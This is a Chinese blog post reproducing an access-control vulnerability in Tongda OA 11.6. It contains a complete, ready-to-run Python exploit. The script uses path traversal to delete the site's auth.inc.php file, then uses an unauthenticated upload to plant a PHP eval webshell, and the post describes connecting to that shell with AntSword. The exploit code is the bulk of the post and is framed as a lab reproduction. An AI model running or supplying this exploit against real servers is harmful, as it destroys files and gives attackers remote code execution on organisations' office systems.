通达OA11.6版本越权漏洞复现

于 2020-08-21 12:14:40 发布
阅读量1.7k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/108144165
版权

环境搭建

现在通达官网已经把版本升级到了11.7,所以下载11.6版本需要去第三方下载平台

安装OA

傻瓜式安装,配置界面如下。完成安装之后就可以暂时不用管它了
在这里插入图片描述
在这里插入图片描述

访问网站

界面如下:
在这里插入图片描述

使用exp脚本

脚本内容如下,核心思路就是删除网站里的一个名为auth.inc.php的文件,进而越权拿shell

import requests
#填写ip
target="http://ip/"  
#一句话木马的密码是hahaha   
payload="<?php eval($_POST['hahaha']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
#删除网站里的一个名为auth.inc.php的文件
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"  
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

在这里插入图片描述
程序执行之后出现了一个URL,那个URL就是一句话木马所在位置

蚁剑拿shell

在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值